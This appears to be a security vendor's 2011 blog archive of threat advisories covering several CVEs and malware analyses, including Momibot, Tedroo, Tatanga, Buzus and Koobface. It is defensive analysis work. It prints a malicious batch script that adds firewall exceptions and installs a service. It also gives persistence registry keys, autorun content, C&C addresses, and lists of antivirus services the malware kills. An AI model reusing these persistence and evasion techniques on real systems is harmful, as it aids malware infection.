Posts

Novell Netware FTP Server Buffer Overflow (Mar 25, 2011)

/in /by

Novell Netware is a network operating system developed by Novell. One of the services provided by Novell Netware is Netware FTP Server, which supplies file-transferring to and from Netware volumes.

FTP is built on a client-server architecture and utilizes separate control and data connections between the client and server. Several FTP commands are available to perform different operations. The DEL/DELE command performs file deletion on the FTP server.

The syntax for DEL/DELE command is as follow:

DEL
or
DELE

A stack buffer overflow vulnerability exists in Novell Netware FTP Server. The vulnerability is due to insufficient boundary checks when processing the DEL/DELE command. Remote authenticated attackers could exploit this vulnerability by connecting to a vulnerable Netware FTP Server and sending a malicious DEL/DELE command to the target server. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the FTP service. Code injection that does not result in execution would terminate the FTP session.

The vulnerability has been assigned as CVE-2010-4228.

SonicWALL has released several IPS signatures to detect and block exploits targeting this vulnerability. The signatures are listed below:

  • 238 – DELE Command BO Attempt

  • 5541 – Generic FTP Shellcode Exploit 1
  • 2099 – Generic FTP Shellcode Exploit 2
  • 4961 – Generic FTP Shellcode Exploit 3
  • 4982 – Generic FTP Shellcode Exploit 4
  • 6367 – Generic FTP Shellcode Exploit 5

Momibot Worm – Spreading in the Wild (March 18, 2011)

/in /by

SonicWALL UTM Research team received reports of a new variant of Momibot worm propagating in the wild. This worm propagates through emails, network and removable drives.

Process of Infection:

An unsuspecting user may receive an email with the malware attachment.

From: {user}
Subject: nake pics as you’ve requested
Attachment: picofme.zip (59.3KB)

    screenshot

Installation:

Once the user opens and executes the attachment, it will do the following:

Drops a copy of itself:

  • %System%{random filename in %System%}{random letter}.exe – [ detected as GAV: Momibot.B_4 (Trojan) ]
  • %System%{random filename}.dat – [ Data File ]

Registry Changes

Adds the following AutoStart registry entries to ensure that the malware runs on every system startup.

  • HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
    Value: Win32Update
    Data: “C:WINDOWSSystem32{random filename in %System%}{random letter}.exe”
  • HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices
    Value: Win32Update
    Data: “C:WINDOWSSystem32{random filename in %System%}{random letter}.exe”
  • HKEY_LOCAL_MACHINESoftwareMicrosoftOLE
    Value: Win32Update
    Data: “C:WINDOWSSystem32{random filename in %System%}{random letter}.exe”
  • HKEY_LOCAL_MACHINESystemCurrentControlsetControlLsa
    Value: Win32Update
    Data: “C:WINDOWSSystem32{random filename in %System%}{random letter}.exe”

Adds the following registry entries to install the malware as a Service. Service name was derived from appending two existing services already installed in the system.

  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermServiceRSVP
    Value: ImagePath
    Data: “C:WINDOWSSystem32{random filename in %System%}{random letter}.exe”

Mutex

Creates this mutex to ensure only a single instance is running in the memory.

  • 9LZZ1TXjZ5NHrnf71f

Command & Control (C&C) Server connection:

Upon successful installation, it tries to connect to a remote server to receive further instruction:

  • http://9{REMOVED}5.174

This worm will also join the following IRC Channel to receive instruction:

  • Port: 6667
  • IRC Channel: #AllNiteCafe

Backdoor Functionality:

  • Update itself
  • Remove itself
  • Download and execute files
  • Gather system information

SonicWALL Gateway AntiVirus provides protection against this worm via the following signatures:

GAV: Momibot.B_4 (Trojan)

Adobe Flash Player 0-Day Exploit (Mar 17, 2011)

/in /by

SonicWALL UTM Research team found reports of new 0-day vulnerability in Adobe Flash Player 10 and the “authplay.dll” file that ships with Adobe Reader and Acrobat X products.

An attacker can exploit this vulnerability by enticing a user to open a crafted Excel spreadsheet (.xls), which contains a malicious Flash (.swf) file. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the currently logged in user. Code injection that does not result in execution would terminate the application due to memory corruption.

The vulnerability has been assigned as CVE-2011-0609.

SonicWALL has released an IPS signature to detect and block known exploits targeting this vulnerability. The following signature was released to address this issue:

  • 6349 – Adobe Flash Player Code Execution Attempt

Tedroo Spam Trojan (Mar 11, 2011)

/in /by

SonicWALL UTM Research discovered a newer variant of Tedroo trojan spreading in the wild. This variant of the Tedroo trojan was in turn found to be spamming the newer variant of Spyeye trojan. When the Tedroo trojan is downloaded and executed it performs the following activities:

  • It creates the following files:
    • %temp%DATF2.tmp.exe (Copy of Itself) [Detected as GAV: Tedroo.AQ (Trojan)]
    • %windir%system32driversstr.sys (encrypted data file)

  • It creates the following registry entry to ensure that the dropped malware runs as a service on every system reboot:
    • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceshxwclmobypwlr: “%temp%DATF2.tmp.exe”

  • It makes the following HTTP requests to a remote IP address:
    • POST /548/getcfg.php – This request returns a configuration file which is encrypted
    • GET /spm/s_get_host.php?ver=548 – This request retuns the public IP address of the infected host
    • GET /spm/s_alive.php?id={removed}&tick=1691546&ver=548&smtp=ok&sl=1&fw=0&pn=0&psr=0
      It reports back information regarding the infected machine with various parameters. Some of the parameters used are:
      • id: random id for infected machine
      • tick: system uptime in milliseconds
      • ver: version of Tedroo
      • smtp: Returns “ok” if SMTP servers are reachable after checking connectivity to mail servers for Mail,Hotmail,Yahoo,Google and AOL
      • fw: returns firewall status
    • GET /spm/s_task.php?id={removed}&tid=38666 – This request returns a list of email addresses, email content to spam and other information

      • screenshot

  • It spams the new Spyeye trojan. The email is crafted to appear like it originates from DHL:

    screenshot

  • The attachment in the email is a zip file which contains the following file:
    • doc.exe [Detected as GAV: Spyeye.Y (Trojan)]

SonicWALL Gateway AntiVirus provides protection against these threats via the following signatures:

GAV: Tedroo.AQ (Trojan)
GAV: Spyeye.Y (Trojan)

screenshot screenshot

New banking Trojan – Tatanga (Mar 4, 2011)

/in /by

SonicWALL UTM Research team received reports of a new banking Trojan named Tatanga in the wild. Spain, Germany, United States & United Kingdom are top countries affected by this Trojan.

This Trojan has many sophisticated features resembling functions found in the popular Crime-ware toolkits Zeus & SpyEye which includes:

  • Encrypted configuration files.
  • Encrypted communication between the bot and the Command & Control server.
  • Dynamic HTML injection affecting users of popular browsers like IE, Firefox, Chrome, Safari etc.
  • Disables AV applications.
  • Harvests e-mail addresses & other sensitive information.
  • Removes other malware infection specifically Zeus.

Upon infection, the Trojan performs following activities on the victim machine:

  • Injects itself into explorer.exe process and conceals its presence on the system. Logs information related to banking session including credentials & uploads it to a remote server.

  • Drops the following files:
    • %User Application Data%MicrosoftInternet Explorer report.exe <- Copy of itself [ Detected as: GAV: Tatanga.gen (Trojan) ]
    • %User Local Settings%Temp report.dll <- [ Detected as: GAV: Pincav.BAHA (Trojan) ]
    • %User Application Data%Help a.dll
    • %User Application Data%Help d.dll
    • %User Application Data%Help n.dll
    • %User Application Data%Help p.dll

      • DLL files dropped in Help directory are encrypted data files.

  • Attempts to communicate with C&C server via a predetermined list of compromised web sites.

    • screenshot

  • Disables the host Antivirus application.

  • Adds following registry entry to bypass firewall restrictions:
    • Key: [HKLMSYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList] Value: “c:windowsexplorer.exe”
      Data: “c:windowsexplorer.exe:*:Enabled:explorer”

Screenshots showing some statistics from control panel used by this banking Trojan:

screenshot

screenshot

SonicWALL Gateway AntiVirus provides protection against this Trojan via following signature:

  • GAV: Tatanga.gen (Trojan)

VideoLAN VLC Media Player Subtitle Heap BO (Mar 03, 2011)

/in /by

VideoLAN is a project that develops software for playing video and other media formats across a local area network (LAN). It originally developed two programs for media streaming, VideoLAN Client (VLC) and VideoLAN Server (VLS), but most of the features of VLS have been incorporated into VLC, with the result renamed VLC media player. VLC media player is a free and open source media player and multimedia framework.

VLC media player can play many audio and video formats (MPEG, DivX, ogg, Wave etc.) as well as various streaming protocols. The Matroska Multimedia Container, an open standard, free container format, is one that can be played by VLC media player. The Matroska can hold an unlimited number of video, audio, picture or subtitle tracks inside a single file. It is intended to serve as a universal format for storing common multimedia content, like movies or TV shows. Matroska is similar in concept to other containers like AVI, MP4 or ASF, but is entirely open in specification, with many implementations in open source software. Matroska file types are .MKV for video (with subtitles and audio), .MKA for audio-only files and .MKS for subtitles only.

The Matroska file format is based on Extensible Binary Meta Language (EBML), a generalized file format similar to XML. The Matroska files only have two different top level elements, EBML and Segment. The Segment is the top level container for multimedia data. The Tracks element contains information about the tracks that are stored in the Segment, such as track type (audio, video, subtitles), the codec used, resolution and sample rate.

A heap buffer overflow vulnerability exists in VLC Media player. When handling subtitles, the application can overflow a heap buffer through lack of bounds checking in the StripTags() function while processing strings with an opening “<" without the terminating ">“. A remote attacker could exploit this vulnerability to overflow the heap buffer and inject arbitrary code. The injected code will be run under the security context of the logged in user.

SonicWALL IPS team has researched the vulnerability and created the following IPS signature to cover exploits related to it:

  • 6286 VideoLAN VLC Media Player Subtitle Heap BO Exploit 1
  • 6287 VideoLAN VLC Media Player Subtitle Heap BO Exploit 2

The vulnerability is referred by CVE as CVE-2011-0522

New Windows Live Messenger worm (Feb 25, 2011)

/in /by

The SonicWALL UTM Research team received reports of a new variant of a Windows Live messenger Worm propagating in the wild. This Worm spreads by presenting various links to users on the MSN contact list of the compromised user. The Worm also downloads FakeAV software upon installation.

An unsuspecting user may receive a message over the MSN Messenger network containing a link to a malicious file:

Upon execution of the downloaded file, the FakeAV software will display the following pop-up:

It will perform a fake scan of the system:

Upon pressing “Yes” the Trojan will pop up a payment page in Internet Explorer for purchasing the FakeAV software:

The worm performs the following DNS queries:

  • www.startacademy.be
  • host5500.net

It downloads www.{removed}/bb.exe [Detected as GAV: Buzus.HAPC (Trojan)] and renames the file to 4417934.exe

The following files are dropped on the compromised system:

  • C:Documents and Settings{USER}Application Datamsnsvconfig.txt
  • C:Documents and Settings{USER}Local SettingsTemp4417934.exe [Detected as GAV: Buzus.HAPC (Trojan)]
  • C:Documents and Settings{USER}Microsoft-Driver-1-52-2475-9627-8645winrsvn.exe [Detected as GAV: Buzus.HAPC (Trojan)]

Registry modification:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun Microsoft(R) Service Update “C:Documents and Settings{USER}Microsoft-Driver-1-52-2475-9627-8645winrsvn.exe”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList C:Documents and Settings{USER}Microsoft-Driver-1-52-2475-9627-8645winrsvn.exe “C:Documents and Settings{USER}Microsoft-Driver-1-52-2475-9627-8645winrsvn.exe:*:Enabled:Microsoft(R) Service Update”

SonicWALL Gateway AntiVirus provides protection against this malware via following signatures:

  • GAV: Buzus.HAPC (Trojan)
  • GAV: IRCBot.DTO_2 (Trojan)

MS Windows Active Directory BO (Feb 18, 2011)

/in /by

Microsoft Windows Active Directory is a directory service running on Windows domain controllers. Active Directory utilizes the Computer Browser service technology to collect, distribute, and obtain information about workgroups, domains, and individual hosts on a network.

The Computer Browser service typically uses connectionless server broadcasts to communicate between nodes. Registration, announcements, and browser elections are performed by the service to provide the network with a list of available resources. Individual nodes on a browser system play various browser roles. There are five browse service roles that computers can play in the browser system: 

Non-Browser Potential Browser Backup Browse Server Master Browse Server Domain Master Browser

All Windows Server 2003 domain controllers are configured as either master browse servers or backup browse servers. A server broadcasts a Host Announcement message on startup to announce its presence to the master browse server. The process of adding a new server entry to the master browse server’s browse list is called registration. In the case where there is no WINS server, all name registrations as well as name lookups are done by UDP broadcast. Where a WINS server is used, the Windows client will use UDP unicast to register with the WINS server. This name is registered by the master browse server and is used to broadcast and receive domain announcements on the local subnet. A Browser Election takes place to select a new master browse server under the following circumstances: 

A host cannot locate a master browse server Preferred master browse server comes online Windows-based domain controller starts A back-up browse server cannot contact the master browse server

A computer initiates an election by broadcasting a Browser Election Request. The Browser Election Request is transmitted over SMB. This request has the following format: 

Offset Size Description ------ ---- ----------------------------------------------------------- 0x0000 1    Command  0x0001 1    Election Version 0x0002 4    Election Criteria 0x0006 4    Client uptime  0x000A 4    Unused 0x000E N    Null-terminated ASCII server name

If a browser receives this request with a lower ranking of election criteria than its own, then the browser sends its own Browser Election Request. If the browser does not have a higher ranking value then the browser attempts to determine which computer is the new master browse server.

A heap overflow vulnerability exists in Microsoft Windows Server 2003, when configured as an Active Directory server. The vulnerability is due to a boundary error in the kernel component of the Windows Browsing service that is responsible for handling the incoming Browsing Election Requests. The vulnerable code fails to properly handle overly long ServerName field values. When an overly long ServerName field is encountered, the code allocates a fixed size buffer to store multiple fields, starting with the ServerName field. A ServerName field that is longer than the allowable size, will cause the calculation of the size of the remainder of the buffer to be equal to zero. Later on in the process flow, this zero size is decreased by one, causing an integer underflow. The code performs additional calculations on the value at which point it uses the final value as the size for a double word copy operation into the aforementioned buffer. The copy operation overruns the buffer and corrupts memory. This condition can potentially lead to overwritten function pointers and code injection and execution. Successful exploitation may lead to kernel-level code injection and execution. Unsuccessful code execution attacks may cause a target system to crash, leading to a system-wide denial of service condition.

SonicWALL has released an IPS signature to detect and block generic attack attempts targeting this vulnerability. The following signature has been released:

  • 6253 -MS Windows Active Directory BROWSER ELECTION BO Attempt

In addition to this threat specific signature, SonicWALL routinely releases generic signature that detect frequently used byte patterns in exploitation attempts of vulnerabilities such as this one.

This vulnerability has been assigned the id CVE-2011-0654 by mitre.

Buzus.GDEF – Mass-Mailing Worm (Feb 18, 2011)

/in /by

SonicWALL UTM Research team received reports of a new variant of mass-mailing worm propagating in the wild. This worm propagates through emails,P2P applications, network and removable drives.

Process of Infection:

An unsuspecting user may receive an email with the malware attachment. This worm can send emails as follows:

From: invitations@twitter.com
Subject: Your friend invited you to Twitter!
Attachment: Invitation Card.zip

    screenshot

From: order-update@amazon.com
Subject: Shipping update for your Amazon.com order
Attachment: Shipping documents .zip

    screenshot

From: update@facebookmail.com
Subject: You have got a new message on Facebook!
Attachment: Facebook message.zip

    screenshot

From: e-cards@hallmark.com
Subject: You have received A Hallmark E-Card!
Attachment: Postcard.zip

    screenshot

From: invitations@hi5.com
Subject: Laura would like to be your friend on hi5!
Attachment: Invitation Card.zip

    screenshot

From: resume-thanks@google.com
Subject: Thank you from Google!
Attachment: CV-20100120-112.zip

    screenshot

It may also send a phishing email:

    screenshot

Installation:

Once the user opens and executes the attachment, it will do the following:

Drops a copy of itself:

  • WINDOWSsystem32PCSuite.exe – [ detected as GAV: Buzus.GDEF (Trojan) ]
  • WINDOWSsystem32sta-css.exe – [ detected as GAV: (Cloud) Mufanom.APSW (Trojan) ]
  • WINDOWS{random}.dll – [ detected as GAV: (Cloud) Mufanom.APSW (Trojan) ]
  • WINDOWSsystem32stat-cpe.exe – [ detected as GAV: Twain.A (Trojan) ]

Registry Changes

Adds the following registry entries to ensure that the malware runs on every system startup.

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
    Value: Nokia Launch Application
    Data: “C:WINDOWSSystem32PCSuite.exe”
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
    Value: Yravasaxog
    Data: “WINDOWSw3dyu1.dll”,Startup””

Added the following registries as part of its installation:

  • Key: HKEY_CURRENT_USERSoftwareNokia4
  • Key: HKEY_LOCAL_MACHINESoftwareNokia4
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer nok01 “11”
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer nok01 “24”
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem EnableLUA dword:00000000
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity CenterUACDisableNotify InNewValue dword:00000001

Adds following registry entry to bypass firewall restrictions:

  • Key: [HKLMSYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList] Value: “C:WINDOWSsystem32PCSuite.exe”
    Data: “C:WINDOWSsystem32PCSuite.exe:*:Enabled:Explorer”

Mutex

Creates this mutex to ensure only a single instance is running in the memory.

  • PCSuite.exeDm28sf0V@XK$NX8hOu

Propagation

Removable Drives

Drops Autorun.inf and copy of itself as redmond.exe on and removable drives.

    [autorun]
    open= RECYCLER S-1-6-21-2434476521-1645641927-702000330-1542redmond.exe
    icon=%SystemRoot%system32SHELL32.dll,4
    action=Open folder to view files
    shellopen=Open
    shellopencommand= RECYCLER S-1-6-21-2434476521-1645641927-702000330-1542redmond.exe
    shellopendefault=1

Peer-2-Peer Application

May copy itself in the following folders using listed filenames below:

Folder:

  • C:program filesicqshared folder
  • C:program filesgrokstermy grokster
  • C:program filesemuleincoming
  • C:program filesmorpheusmy shared folder
  • C:program fileslimewireshared
  • C:program filesteslafiles
  • C:program fileswinmxshared
  • C:Downloads

Filename:

  • Ad-aware 2010.exe
  • Adobe Acrobat Reader keygen.exe
  • Adobe Illustrator CS4 crack.exe
  • Adobe Photoshop CS5 crack.exe
  • Alcohol 120 v1.9.7.exe
  • Anti-Porn v13.5.12.29.exe
  • AnyDVD HD v.6.3.1.8 Beta incl crack.exe
  • Ashampoo Snap 3.02.exe
  • AVS Video Converter v6.3.1.365 CRACKED.exe
  • BitDefender AntiVirus 2010 Keygen.exe
  • Blaze DVD Player Pro v6.52.exe
  • CleanMyPC Registry Cleaner v6.02.exe
  • Daemon Tools Pro 4.50.exe
  • Divx Pro 7 + keymaker.exe
  • Download Accelerator Plus v9.exe
  • Download Boost 2.0.exe
  • DVD Tools Nero 10.5.6.0.exe
  • G-Force Platinum v3.7.5.exe
  • Google SketchUp 7.1 Pro.exe
  • Grand Theft Auto Episodes From Liberty City 2010.exe
  • Image Size Reducer Pro v1.0.1.exe
  • Internet Download Manager V5.exe
  • Kaspersky AntiVirus 2010 crack.exe
  • K-Lite Mega Codec v5.5.1.exe
  • K-Lite Mega Codec v5.6.1 Portable.exe
  • LimeWire Pro v4.18.3.exe
  • MagicISO Magic ISO Maker v5.5.0276 Cracked.exe
  • McAfee Total Protection 2010.exe
  • Microsoft.Windows 7 ULTIMATE FINAL activator+keygen x86.exe
  • Motorola
  • Mp3 Splitter and Joiner Pro v3.48.exe
  • ms09-067.exe
  • Myspace theme collection.exe
  • Nero 9 9.2.6.0 keygen.exe
  • Norton Anti-Virus 2010 crack.exe
  • Norton Internet Security 2010 crack.exe
  • PCSuite.exe
  • PDF password remover (works with all acrobat reader).exe
  • PDF to Word Converter 3.0.exe
  • PDF Unlocker v2.0.3.exe
  • PDF-XChange Pro.exe
  • Power ISO v4.2 + keygen axxo.exe
  • Rapidshare Auto Downloader 3.8.exe
  • RapidShare Killer AIO 2010.exe
  • Sony Vegas Pro v9.0a incl crack.exe
  • Sophos antivirus updater bypass.exe
  • Starcraft2 battle.net key generator.exe
  • Starcraft2 battle.net keys.txt.exe
  • Starcraft2.exe
  • Starcraft2 REGION-UNLOCKER.exe
  • Starcraft2 SERVER-CHANGER.exe
  • Super Utilities Pro 2009 11.0.exe
  • Total Commander7 license+keygen.exe
  • Trojan Killer v2.9.4173.exe
  • Tuneup Ultilities 2010.exe
  • Twitter FriendAdder 2.1.1.exe
  • Uniblue RegistryBooster 2010.exe
  • VmWare 7.0 keygen.exe
  • VmWare keygen.exe
  • Winamp.Pro.v7.33.PowerPack.Portable+installer.exe
  • Windows 2008 Enterprise Server VMWare Virtual Machine.exe
  • Windows2008 keygen and activator.exe
  • Windows 7 Ultimate keygen.exe
  • Windows XP PRO Corp SP3 valid-key generator.exe
  • WinRAR v3.x keygen RaZoR.exe
  • YouTubeGet 5.4.exe
  • Youtube Music Downloader 1.0.exe

Email Propagation

Harvests email addresses from files with the following extensions:

  • asp
  • dbx
  • doc
  • htm
  • log
  • lst
  • nfo
  • php
  • rtf
  • txt
  • wab
  • wpd
  • wps
  • xls
  • xml

It avoids sending email with addresses having the following strings:

  • .com
  • .gov
  • .mil
  • abuse
  • acd-group
  • acdnet.com
  • acdsystems.com
  • acketst
  • admin
  • ahnlab
  • alcatel-lucent.com
  • anyone
  • apache
  • arin.
  • avg.comsysinternals
  • avira
  • badware
  • berkeley
  • bitdefender
  • bluewin.ch
  • borlan
  • bpsoft.com
  • bsd
  • bugs
  • buyrar.com
  • ca
  • certific
  • cisco
  • clamav
  • contact
  • debian
  • drweb
  • eset.com
  • example
  • f-secure
  • fido
  • firefox
  • fsf.
  • ghisler.com
  • gimp
  • gnu
  • gold-certs
  • gov.
  • help
  • honeynet
  • honeypot
  • iana
  • ibm.com
  • icrosoft
  • idefense
  • ietf
  • ikarus
  • immunityinc.com
  • info
  • inpris
  • isc.o
  • isi.e
  • jgsoft
  • kaspersky
  • kernel
  • lavasoft
  • linux
  • listserv
  • mcafee
  • me
  • messagelabs
  • mit.e
  • mozilla
  • mydomai
  • no
  • nobody
  • nodomai
  • noone
  • not
  • nothing
  • novirusthanks
  • ntivi
  • nullsoft.org
  • page
  • panda
  • pgp
  • postmaster
  • prevx
  • privacy
  • qualys
  • quebecor.com
  • rating
  • redhat
  • rfc-ed
  • root
  • ruslis
  • sales
  • samba
  • samples
  • secur
  • security
  • sendmail
  • service
  • site
  • slashdot
  • soft
  • somebody
  • someone
  • sopho
  • sourceforge
  • spam
  • spm
  • ssh.com
  • submit
  • sun.com
  • support
  • suse
  • syman
  • tanford.e
  • the.bat
  • unix
  • usenet
  • utgers.ed
  • virus
  • virusbuster
  • webmaster
  • websense
  • winamp
  • winpcap
  • wireshark
  • www.ca.com
  • www
  • you
  • your

Queries available Mail-Exchange Server to send the email:

    screenshot

Other System Modification:

Delete files from the following directories:

  • Program Filesprevx

Delete files related to the following registry entry:

  • HKEY_LOCAL_MACHINESOFTWAREMcAfeeAVEngine szInstallDir = “mcshield.exe”
  • HKEY_LOCAL_MACHINESOFTWAREMalwarebytes’ Anti-Malware InstallPath = *.*”

Terminates the following services related to AV security softwares:

  • AVP
  • AntiVirSchedulerService
  • Arrakis3
  • CSIScanner
  • CaCCProvSP
  • ERSvc
  • Ehttpsrv
  • Emproxy
  • FPAVServer
  • GWMSRV
  • K7EmlPxy
  • K7RTScan
  • K7TSMngr
  • LIVESRV
  • LiveUpdate Notice Service
  • MBAMService
  • MCNASVC
  • MPFSERVICE
  • MPS9
  • McAfee HackerWatch Service
  • Norton AntiVirus
  • PANDA SOFTWARE CONTROLLER
  • PAVFNSVR
  • PAVPRSRV
  • PAVSVR
  • PSHOST
  • PSIMSVC
  • PSKSVCRETAIL
  • RSCCenter
  • RSRavMon
  • SAVScan
  • SUM
  • Savadminservice
  • Savservice
  • Sophos Agent
  • Sophos Autoupdate Service
  • Sophos Certification Manager
  • Sophos Management Service
  • Sophos Message Router
  • Symantec Core LC
  • TPSRV
  • ThreatFire
  • VSSERV
  • WerSvc
  • WinDefend
  • XCOMM
  • antivirservice
  • avast! Antivirus
  • avast! Mail Scanner
  • avast! Web Scanner
  • avg8emc
  • avg8wd
  • bdss
  • ccEvtMgr
  • ccproxy
  • ccpwdsvc
  • ccsetmgr
  • ekrn
  • liveupdate
  • mcODS
  • mcmisupdmgr
  • mcmscsvc
  • mcpromgr
  • mcproxy
  • mcredirector
  • mcshield
  • mcsysmon
  • msk80service
  • navapsvc
  • npfmntor
  • nscservice
  • sbamsvc
  • scan
  • sdauxservice
  • sdcodeservice
  • sndsrvc
  • spbbcsvc
  • wscsvc

C&C Server

Sends information to the following remote server:

    153.26.137.241

Anti-debugging Technique

Checks for the following SoftIce Debugger driver:

  • \.SICE
  • \.NTICE
  • \.SIWVIDSTART

Anti-VMware:

Checks if its running in VMWare

  • \.VMDRV

SonicWALL Gateway AntiVirus provides protection against this worm via the following signatures:

GAV: Buzus.GDEF (Trojan) (Trojan)
GAV: Twain.A (Trojan)
GAV: Mufanom.APSW (Trojan)
GAV: (Cloud) Mufanom.APSW (Trojan)

screenshot

Koobface.HJV – Spreading in the wild (Feb 04, 2011)

/in /by

The Sonicwall UTM Research team discovered a new malicious Worm spreading in the wild. The Worm spreads via Facebook profiles and as part of its post-infection activity, it installs Fake AVG antivirus security software.

The Worm performs the following DNS queries:

  • www.google.com
  • facebook.com
  • www.facebook.com
  • d.static.ak.fbcdn.net
  • x-treme-radio.host22.com
  • www.ashiww.com
  • www.wahdohotel.nl
  • kingswoodwright.com
  • kbfgb.greyzzsecure9.com
  • 3064972.greyzzsecure9.com

The Worm attempts to load various web pages using random page names with the .css extension:

  • http://206.160.{removed}.9/rsrc.php/yW/r/Xx2bs9YPnF_.css
  • http://206.160.{removed}.9/rsrc.php/ye/r/vOYlUxHAn95.css
  • http://206.160.{removed}.9/rsrc.php/yS/r/w4doJXgUPVR.css
  • http://206.160.{removed}.43/rsrc.php/yX/r/pWROpoRFF42.css
  • http://206.160.{removed}.9/rsrc.php/y4/r/LIj01FurENH.css
  • http://206.160.{removed}.9/rsrc.php/yE/r/4Kozs88a56s.css
  • http://206.160.{removed}.43/rsrc.php/yQ/r/dvBK5Hfjbcc.css
  • http://206.160.{removed}.43/rsrc.php/y-/r/Ki5kfy7_Bje.css
  • http://206.160.{removed}.9/rsrc.php/yL/r/u8Bue217GRs.css
  • http://206.160.{removed}.9/rsrc.php/yW/r/Xx2bs9YPnF_.css

The Worm installs the following files on the system:

  • C:Documents and Settings{USER}Local SettingsTempfeb.bat
  • C:Documents and Settings{USER}Local SettingsTempzpskon_1296703528.exe [Detected as GAV: Koobface.FF (Trojan)]
  • C:Documents and Settings{USER}Local SettingsTempzpskon_1296699165.exe [Detected as GAV: Delf.EM (Trojan)]
  • C:WINDOWS5456456z
  • C:WINDOWSbt7.dat
  • C:WINDOWSjjp156.exe [Detected as GAV: Koobface.HJV_2 (Worm)]
  • C:WINDOWSsystem32feb.dll [Detected as GAV: Koobface.HJV_3 (Worm)]
  • C:WINDOWSsystem32driversfeb.sys [Detected as GAV: Koobface.FF (Trojan)]

feb.bat contains:

      netsh firewall add allowedprogram name="feb" program="C:WINDOWSsystem32svchost.exe" mode=enable
      netsh firewall add portopening tcp 8087 feb enable
      sc create "ffeb" type= interact type= share start= auto binpath= "C:WINDOWSsystem32svchost.exe -k ffeb"
      reg add "hklmsystemcurrentcontrolsetservicesffebparameters" /v servicedll /t reg_expand_sz /d "C:WINDOWSsystem32feb.dll" /f
      reg add "hklmsystemcurrentcontrolsetservicesffeb" /v failureactions /t reg_binary /d 00000000000000000000000003000000140000000100000060ea00000100000060ea00000100000060ea0000 /f
      reg add "hklmsoftwaremicrosoftwindows ntcurrentversionsvchost" /v ffeb /t reg_multi_sz /d "ffeb" /f
      sc start ffeb

feb.dll contains a list or URL’s all of which are either taken down or lead to blank pages at the time of writing. Below is a sample of the URL’s contained feb.dll:

  • impri{removed}.gr/.lhinrs/
  • hk{removed}.org/.ycguh3/
  • roomservi{removed}.com.au/.9mov05w/
  • nubs.wo{removed}.co.uk/.7txq/
  • lenga{removed}.com/.ck5rg8/
  • cayenneo{removed}.com/.fplf/
  • www.dead{removed}.co.uk/.qe9v/
  • ib{removed}.org.il/.5cei7f9/
  • www.kurdist{removed}.com/.x5fyik/
  • heali{removed}.co.za/.12vatd/
  • forwardmar{removed}.org/.6sta03t/
  • numerus-{removed}.fr/.li81/
  • fino{removed}.com/.ea2cuwa/
  • fe{removed}.co.za/.jts51/
  • tarr{removed}.com/.5fu3/
  • toppla{removed}.nl/.vfnc/
  • www.fishingfo{removed}.com/.5wmm9/

The worm installs the following registry keys to ensure startup of jjp156.exe and the feb.sys driver:

  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer NoAutoUpdate dword:00000001
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer NoWindowsUpdate dword:00000001
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvcHost ffeb hex(7):66,66,65,62,00,00,
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun dfg49df “c:windowsjjp156.exe”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_FEB NextInstance dword:00000001
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_FEB000 Service “feb”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesfeb ImagePath hex(2):”??C:WINDOWSsystem32driversfeb.sys”

Upon installation the Worm informs the user that it needs to perform a “Scan” of the system:

It performs a fake system scan which is hosted on a Fake AV landing page:

  • http://3064972.greyzzsecure9.com/defender/?914ea0a274=vmzd&8a83854da2d=jjdjtamdvz&5f701=jvottyajzt

screenshot

When clicking on “Remove all” or “Cancel” it attemps to initiate the download of:

  • bitav_2053_ext6.exe [Detected as GAV: TDSS.ABCR (Trojan)]

The worm will periodically cause pop-up messages such as in the screenshot below:

When clicking OK to such pop-up messages the Worm will bring up further Fake AV pages which attempt to download more malware to the infected machine such as:

  • pack.exe [Detected as GAV: SecurityTool.W (Trojan)]

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Koobface.HJV (Worm)
  • GAV: Koobface.HJV_2 (Worm)
  • GAV: Koobface.HJV_3 (Worm)
  • GAV: Koobface.FF (Trojan)
  • GAV: Delf.EM (Trojan)
  • GAV: TDSS.ABCR (Trojan)
  • GAV: SecurityTool.W (Trojan)